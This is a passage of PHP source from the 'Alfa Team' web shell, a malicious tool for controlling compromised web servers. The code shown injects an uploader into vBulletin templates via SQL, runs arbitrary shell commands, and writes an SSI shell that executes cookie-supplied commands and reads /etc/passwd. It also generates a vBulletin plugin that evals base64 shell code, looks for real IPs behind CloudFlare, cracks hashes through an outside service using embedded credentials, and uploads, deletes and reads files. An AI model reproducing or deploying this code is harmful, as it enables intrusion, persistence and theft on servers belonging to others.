- echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value);
- return false;
- ">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50') );
- create_table($table);
- echo $selector;
- echo '<p><input type="submit" value=" " /></p></form></center>';
- if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){ $method = $_POST['alfa8'];
- $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
- $conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
- $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
- $recivedata = @mysqli_query($conn,$rec);
- $getd = @mysqli_fetch_assoc($recivedata);
- $savetoass = $getd['template'];
- $code = str_replace("'","\'",$code);
- $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
- $ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
- $geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
- $getval = @mysqli_fetch_assoc($geturl);
- $saveval = $getval['value'];
- $realurl = parse_url($saveval,PHP_URL_HOST);
- $realpath = parse_url($saveval,PHP_URL_PATH);
- $res = false;
- $AlfaCurl = new AlfaCURL();
- if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){ if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){ @fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
- @fputs($fsock, "HOST: $realurl\r\n");
- @fputs($fsock, "Connection: close\r\n\r\n");
- $check = fgets($fsock);
- if(preg_match("/200 OK/i",$check)){ $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
- $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
- $res = true;
- } @fclose($fsock);
- } }elseif(function_exists('curl_version') && $method == 'auto'){ $AlfaCurl->Send($realurl.$realpath."/faq.php");
- $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
- $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
- $res = true;
- } if($res){ $ff = 'http://'.$realurl.$realpath."/solevisible.php";
- output($ff);
- }else{ $ff = 'http://'.$realurl.$realpath."/faq.php";
- $fff = 'http://'.$realurl.$realpath."/solevisible.php";
- echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";
- }}} echo '</div>';
- alfafooter();
- } function alfaConsole(){echo alfaEx($_POST['cmd']);
- } function alfacmd(){ alfahead();
- $help = "Help:\n\tChange Color :\n\t\tSyntax: color [red - yellow - green etc...]\n\t\tExample: color green\n\n\tClear Outputs:\n\t\tSyntax: clear | cls | reset";
- echo '<div class=header>';
- echo '<form name="cf" onsubmit="execute();
- return false;
- "><textarea class="bigarea" id="output" name="output" style="border-bottom:0;
- margin:0;
- " readonly>'.$help.'</textarea>
- <table style="border:1px solid;
- background-color:;
- border-top:0px;
- " cellpadding="0" cellspacing="0" width="100%"><tr><td width="1%">></td><td><input id="cmd" type="text" name="cmd" placeholder="ls -la" style="border:0px;
- width:100%;
- ""></td></tr></table>
- </form>';
- echo '</div>';
- alfafooter();
- } function alfassiShell(){ alfahead();
- echo '<div class=header>';
- @mkdir('alfa_shtml',0755);
- @chdir('alfa_shtml');
- alfacgihtaccess('shtml');
- $code = '<!--#config errmsg="[Error]"--><!--#config sizefmt="bytes"--><!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"GET\")" --><!--#set var="shl" value="ls -la" --><!--#else --><!--#set var="shl" value=$HTTP_COOKIE --><!--#endif --> <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"POST\")" --><!--#set var="inc" value="/../../../../../../../etc/passwd" --><!--#else --><!--#set var="inc" value=$HTTP_COOKIE --> <!--#endif --> <html><head><title>Alfa Team SSI Shell</title><script language="javascript">function doit( mode ) {if( document.cookie != "" ) {var cookies = document.cookie.split( ";
- " );
- for( var i = 0;
- i < cookies.length;
- ++i )document.cookie = cookies[ i ] + ";
- expires=Thu, 01 Jan 1970 00:00:00 GMT";
- }document.cookie = document.getElementById( mode ).value;
- document.location.reload();
- }function toggle( id ) { document.getElementById( id ).style.display = (document.getElementById( id ).style.display == "none") ? "block" : "none";
- }</script></head><body bgcolor="#000000" alink="blue" vlink="blue"><br><div><center><h3><font color="#59cc33">| Alfa Team SSI Shell |</font></h3></center><br><center><b><u><font size="+1" onclick="toggle(\'env\');
- " style="cursor:pointer;
- color:red;
- ">Enviroment info</font></u></b></center><div id="env" style="display:none;
- color:#67ABDF;
- "><br><pre><!--#printenv--></pre><br></div></div><br><div><center><b><u><font size="+1" onclick="toggle(\'shl\');
- " style="cursor:pointer;
- color:red;
- ">Command for shell</font></u></b></center></div><div align="center" width="100%" border="0" id="shl" style=background-color:#000000;
- <!--#if expr="\"$REQUEST_METHOD\" != \"GET\"" -->display:none;
- <!--#endif -->><br><b><font color="#67ABDF">Enter command</font></b>:
-
-
- <form method="get" onsubmit="doit(\'command\');
- "><input type="text" size="80" id="command">
- <input type="submit" value="Run"></form><br><center><b><font size="+1" color="#67ABDF">Result</font></b></center><br><b><font color="#67ABDF">Executed command:</font></b>
-
-
- <b><font color="#67ABDF"><!--#echo var=shl --></font></b><br><textarea bgcolor="#e4e0d8" cols="121" rows="15"><!--#exec cmd=$shl --></textarea> </div> <div><br><center><b><u><font size="+1" onclick="toggle(\'inc\');
- " style="cursor:pointer;
- color:red;
- ">Operations on files</font></u></b></center><div id="inc" align="center" width="100%" border="0" style=background-color:#000000;
- <!--#if expr="\"$REQUEST_METHOD\" != \"POST\"" -->style=display:none;
- <!--#endif -->><br><b><font color="#67ABDF">View file (virtual include):</font></b>
-
-
- <form method="post" onsubmit="doit(\'vfile\');
- "><input type="text" size=80 id="vfile">
- <input type="submit" value="Run"></form><br><b><font color="#67ABDF">Included file:</font></b>
-
-
- <b><font color="#67ABDF"><!--#echo var=inc --></font></b><br><b><font color="#67ABDF">Size:</font></b>
-
-
- <b><font color="#67ABDF"><!--#fsize virtual=$inc -->
- bytes</font></b><br><textarea bgcolor="#e4e0d8" cols="121" rows="15"><!--#include virtual=$inc --></textarea><br></div></div></body></html>';
- @__write_file('alfa_ssi.shtml',$code);
- @chmod("alfa_ssi.shtml",0755);
- echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
- echo '</div>';
- alfafooter();
- } function alfacloudflare(){ alfahead();
- AlfaNum(8,9,10,7,6,5,4,3);
- echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>');
- return false;
- \" method='post'>
- <p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;
- ' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
- if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){ $url = $_POST['alfa1'];
- if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){ $url = preg_replace('/^(https?):\/\//', '', $url);
- $url = "http://www.".$url;
- } $headers = @get_headers($url, 1);
- $server = $headers['Server'];
- $subs = array('news.','download.','','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns1.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.');
- if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)) { if($matches[2] != 'www') { $url = preg_replace('/^(https?):\/\//', '', $url);
- } else { $url = explode($matches[0], $url);
- $url = $url[1];
- } } if(is_array($server))$server = $server[0];
- echo __pre();
- if(preg_match('/cloudflare/i', $server)) echo "\n[+] CloudFlare detected: {$server}\n<br>";
- else echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
- echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
- echo "[+] Searching for more IP addresses.\n\n<br><br>";
- for($x=0;
- $x<count($subs);
- $x++) { $site = $subs[$x] . $url;
- $ip = is_ipv4(gethostbyname($site));
- if($ip == '(Null)') continue;
- echo "Trying {$site}: {$ip}\n<br>";
- } echo "\n[+] Finished.\n<br>";
- } echo '</div>';
- alfafooter();
- } function is_ipv4($ip){ return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
- } function __alert($s){ echo '<center>'.__pre().$s.'</center>';
- } function create_table($data){ echo '<table border="1">';
- foreach ($data as $key => $val){ $array = array();
- foreach($val as $k => $v){ $array[$k] = $v;
- } echo "<tr><td><div class='tbltxt' style='color:#".$array['color']."'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
- } echo '</table>';
- } function alfaphp2xml(){ alfahead();
- AlfaNum(8,9,10,7,6,5,4,3);
- echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>');
- return false;
- \" method='post'>
- <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
- <input type='submit' name='go' value=' ' /></p></form></center>";
- if($_POST['alfa2']&&$_POST['alfa2']=='>>'){ echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
- echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));
- exit;
- }]]></phpcode></plugin></plugins>';
- echo '</textarea></center></p>';
- } echo '</center></div>';
- alfafooter();
- } function alfacpcrack(){ alfahead();
- echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
- if($_POST['alfa1']=='dec'){ $algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
- echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
- <form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value);
- return false;
- "><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;
- ">';
- foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');
- } echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
- if($_POST['alfa3'] == '>>'){ $hash = $_POST['alfa2'];
- if(!empty($hash)){ $hash_type = $_POST['alfa4'];
- $email = "solevisible@gmail.com";
- $code = "7b9fa79f92c3cd96";
- $target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
- $resp = @file_get_contents($target);
- if($resp==''){ $get = new AlfaCURL();
- $resp = $get->Send($target);
- } echo __pre().'<center>';
- switch($resp){ case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";
- break;
- case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";
- break;
- case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";
- break;
- case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";
- break;
- } if(substr($resp,0,4)!='CODE'&&$resp!=''){ echo "<b>Result: <font color='green'>".$resp."</font></b>";
- }elseif(substr($resp,0,4)!='CODE'){ echo "<font color='red'>NoT Found</font><br />";
- } echo('</center>');
- } } } if($_POST['alfa1']=='analyzer'){ echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
- <form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');
- return false;
- ">
- <div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
- if($_POST['alfa3'] == '>>'){ $hash = $_POST['alfa2'];
- if(!empty($hash)){ $curl = new AlfaCURL();
- $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
- echo(__pre().'<center>');
- if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){ echo('<font color="green">'.$s[1].'</font>');
- }else{ echo('<font color="red">Not Found...!</font>');
- } echo('</center><br>');
- } } } echo '</div>';
- alfafooter();
- } function alfafooter(){ if(!isset($_POST['ajax'])){ echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
- <tr>
- <td width='17%'><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');
- this.f.value='';
- return false;
- \"><span><font color=#27979B>Make File : </font></span><br><input class='dir' type='text' name=f value=' '> <input type='submit' value=' '></form></td>
- <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);
- this.d.value='';
- return false;
- \"><span><font color=#27979B>Make Dir : </font></span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
- <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);
- this.del.value='';
- return false;
- \"><span><font color=#27979B>Delete : </font></span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
- <td width='19%'><form onsubmit=\"g('FilesTools',null,this.f.value,'chmod');
- this.f.value='';
- return false;
- \"><span><font color=#27979B>Chmod : </font></span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
- </tr>
- <tr>
- <td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");
- return false;
- '><span><font color=#27979B>Change Dir : </font></span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
- <td colspan='2'><form onsubmit=\"g('FilesTools','".$GLOBALS['cwd']."',this.file.value,'auto');
- return false;
- \"><span><font color=#27979B>Read File : </font></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
- </tr>
- <tr>
- <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);
- this.c.value='';
- return false;
- \"><span><font color=#27979B>Execute :</font></span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
- </tr>
- <tr>
- <td colspan='4'><form onsubmit='u(this);
- return false;
- ' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
- <input type='hidden' name='a' value='FilesMAn'>
- <input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
- <input type='hidden' name='alfa1' value='uploadFile'>
- <input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
- <span><font color=#27979B>Upload file:</font> <button id='addup' onclick='addnewup();
- return false;
- '><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>
-
- Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);
- '></p><input type='submit' value=' '></form><br>[ ./AlfaTeam ©
- 2012-".date('Y')." ]</td>
- </tr>
- </table>
- </div>
- </body>
- </html>
- ";
- }} if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;
- } } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;
- } } function alfaWhich($p) { $path = alfaEx('which ' . $p);
- if(!empty($path)) return $path;
- return false;
- } function alfaSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB';
- elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB';
- elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB';
- else return $s . ' B';
- } function alfaPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's';
- elseif (($p & 0xA000) == 0xA000)$i = 'l';
- elseif (($p & 0x8000) == 0x8000)$i = '-';
- elseif (($p & 0x6000) == 0x6000)$i = 'b';
- elseif (($p & 0x4000) == 0x4000)$i = 'd';
- elseif (($p & 0x2000) == 0x2000)$i = 'c';
- elseif (($p & 0x1000) == 0x1000)$i = 'p';
- else $i = 'u';
- $i .= (($p & 0x0100) ? 'r' : '-');
- $i .= (($p & 0x0080) ? 'w' : '-');
- $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
- $i .= (($p & 0x0020) ? 'r' : '-');
- $i .= (($p & 0x0010) ? 'w' : '-');
- $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
- $i .= (($p & 0x0004) ? 'r' : '-');
- $i .= (($p & 0x0002) ? 'w' : '-');
- $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
- return $i;
- } function alfaPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>'. substr(sprintf('%o', @fileperms($f)),-4) .'<font color=white> >> </font>'.alfaPerms(@fileperms($f)) . '</font>';
- elseif (!@is_writable($f)) return '<font color=white>'. substr(sprintf('%o', @fileperms($f)),-4) .'<font color=white> >> </font>'.alfaPerms(@fileperms($f)) . '</font>';
- else return '<font color=#25ff00>'. substr(sprintf('%o', @fileperms($f)),-4) .'<font color=white> >> </font>'.alfaPerms(@fileperms($f)) . '</font>';
- } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);
- while (false !== ($filename = readdir($dh))) $files[] = $filename;
- return $files;
- } } function reArrayFiles($file_post){ $file_ary = array();
- $file_count = count($file_post['name']);
- $file_keys = array_keys($file_post);
- for ($i=0;
- $i<$file_count;
- $i++) { foreach ($file_keys as $key) { $file_ary[$i][$key] = $file_post[$key][$i];
- } } return $file_ary;
- } function alfaFilesMan(){ alfahead();
- AlfaNum(8,9,10,7,6,5,4);
- echo '<div class="ajaxarea"><div class="header">';
- if(!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
- if(!empty($_POST['alfa1'])){ switch($_POST['alfa1']){ case 'uploadFile': $files = reArrayFiles($_FILES['f']);
- foreach($files as $file){ @move_uploaded_file($file['tmp_name'],$file['name']);
- } break;
- case 'mkdir': if(!@mkdir(trim($_POST['alfa2']))) echo "<b><font color='red'>Can't create new dir !</b></font>";
- break;
- case 'delete': function deleteDir($path){ $path = (substr($path,-1)=='/') ? $path:$path.'/';
- $dh = @opendir($path);
- while(($item = @readdir($dh)) !== false){ $item = $path.$item;
- if((basename($item) == "..") || (basename($item) == ".")) continue;
- $type = filetype($item);
- if ($type == "dir") deleteDir($item);
- else @unlink($item);
- } closedir($dh);
- @rmdir($path);
- } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f){ if($f == '..') continue;
- $f = urldecode($f);
- if(@is_dir($f)) deleteDir($f);
- else @unlink($f);
- } if(@is_dir(urldecode(@$_POST['alfa2']))) deleteDir(urldecode(@$_POST['alfa2']));
- else @unlink(urldecode(@$_POST['alfa2']));
- break;
- case 'paste': if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){ function copy_paste($c,$s,$d){ if(@is_dir($c.$s)){ @mkdir($d.$s);
- $h = @opendir($c.$s);
- while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/');
- } elseif(is_file($c.$s)) @copy($c.$s, $d.$s);
- } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
- }elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){ function move_paste($c,$s,$d){ if(@is_dir($c.$s)){ @mkdir($d.$s);
- $h = @opendir($c.$s);
- while (($f = @readdir($h)) !== false) if(($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/');
- }elseif(@is_file($c.$s)) @copy($c.$s, $d.$s);
- } foreach($_SESSION['f'] as $f) @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
- }elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){ if(class_exists('ZipArchive')){ $zip = new ZipArchive();
- $zipX = "alfa_".rand(1,1000).".zip";
- if($zip->open($zipX, 1)){ @chdir($_SESSION['c']);
- foreach($_SESSION['f'] as $f){ if($f == '..')continue;
- if(@is_file($_SESSION['c'].$f)) $zip->addFile($_SESSION['c'].$f, $f);
- elseif(@is_dir($_SESSION['c'].$f)){ $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
- foreach($iterator as $key=>$value){ $key = str_replace('\\','/',realpath($key));
- if(@is_dir($key)){ if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
- }else{$zip->addFile($key,$key);
- }}}} @chdir($GLOBALS['cwd']);
- $zip->close();
- __alert('>> '.$zipX.' << is created...');
- }} }elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){ if(class_exists('ZipArchive')){ $zip = new ZipArchive();
- foreach($_SESSION['f'] as $f) { if($zip->open($_SESSION['c'].$f)){ $zip->extractTo($GLOBALS['cwd']);
- $zip->close();
- }}}} unset($_SESSION['f']);
- break;
- default: if(!empty($_POST['alfa1'])){ $_SESSION['act'] = @$_POST['alfa1'];
- $_SESSION['f'] = @$_POST['f'];
- $_SESSION['c'] = @$_POST['c'];
- } break;
- } } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
- if($dirContent === false){ echo '<center><br><span style="font-size:16px;
- "><span style="color: red;
- -webkit-text-shadow: 1px 1px 13px;
- "><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>
- ';
- alfaFooter();
- return;
- } global $sort;
- $sort = array('name', 1);
- if(!empty($_POST['alfa1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match)) $sort = array($match[1], (int)$match[2]);
- } echo "
- <script>
- function checkBox() {
- for(i=0;
- i<d.files.elements.length;
- i++)
- if(d.files.elements[i].type == 'checkbox')
- d.files.elements[i].checked = d.files.elements[0].checked;
- }
- </script>
- <form onsubmit='fc(this);
- return false;
- ' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;
- '><input type='checkbox' id='mchk' onclick='checkBox();
- ' class='chkbx'><label for='mchk'></label></div></th><th><font color=\"#FFFFFF\"><b>Name</font></b></th><th><font color=\"#FFFFFF\"><b>Size<font></b></th><th><font color=\"#FFFFFF\"><b>Modify</b></font></th><th><font color=\"#FFFFFF\"><b>Owner/Group</font></b></th><th><font color=\"#FFFFFF\"><b>Permissions</font></b></th><th><font color=\"#FFFFFF\"><b>Actions</b></font></th></tr>";
- $dirs = $files = array();
- $n = count($dirContent);
- for($i=0;
- $i<$n;
- $i++) { $ow = function_exists("posix_getpwuid")?@posix_getpwuid(@fileowner($dirContent[$i])):array("name" => "????");
- $gr = function_exists("posix_getgrgid")?@posix_getgrgid(@filegroup($dirContent[$i])):array("name" => "????");
- $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => alfaPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) );
- if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
- elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
- elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir'));
- } $GLOBALS['sort'] = $sort;
- function alfaCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
- else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
- } usort($files, "alfaCmp");
- usort($dirs, "alfaCmp");
- $files = array_merge($dirs, $files);
- $l=0;
- $cc=0;
- $mb_strlen = function_exists("mb_strlen")?true:false;
- $mb_substr = function_exists("mb_substr")?true:false;
- foreach($files as $f){ $newname=$f['name'];
- if($mb_strlen&&$mb_substr){if(mb_strlen($f['name'], 'UTF-8')>60){$newname = mb_substr($f['name'], 0, 60, 'utf-8').'...';
- }else{$newname = $f['name'];
- }}else{if(strlen($f['name'])>60){$newname = substr($f['name'], 0, 60).'...';
- }else{$newname = $f['name'];
- }} $checkbox = 'checkbox'.$cc;
- $icon = $GLOBALS['Alfa_Show_Icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
- $style = $GLOBALS['Alfa_Show_Icons']?'position:relative;
- display:inline-block;
- bottom:12px;
- ':'';
- echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.urlencode($f['name']).'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a href=javascript:void(0) onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'auto\')">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<font color=red>".$f['name']."</font>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');
- " title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td>'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=javascript:void(0) onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'. $f['perms'].'</td><td><a class="actions" href="javascript:void(0);
- " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="actions" href="javascript:void(0);
- " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);
- " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="actions" href="javascript:void(0);
- " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);
- " onclick="var chk = confirm(\'Are You Sure For Delete # '.urldecode($f['name']).' # ?\');
- chk ? g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\') : \'\';
- "> X </a></td></tr>';
- $l = $l?0:1;
- $cc++;
- } echo "<tr><td colspan=7>
- <input type=hidden name=a value='FilesMan'>
- <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
- <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
- <select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
- <input type='submit' value=' '>
- </form></table></div></div>";
- alfafooter();
- } function alfaFilesTools(){ alfahead();
- echo '<div class="header">';
- if(isset($_POST['alfa1']))$_POST['alfa1'] = urldecode($_POST['alfa1']);
- if($_POST['alfa2'] == 'auto'){if(is_array(@getimagesize($_POST['alfa1']))){$_POST['alfa2'] = 'image';
- }else{$_POST['alfa2'] = 'view';
- }} if(@$_POST['alfa2'] == 'mkfile'){ $_POST['alfa1'] = trim($_POST['alfa1']);
- if(!file_exists($_POST['alfa1'])){ $fp = @fopen($_POST['alfa1'], 'w');
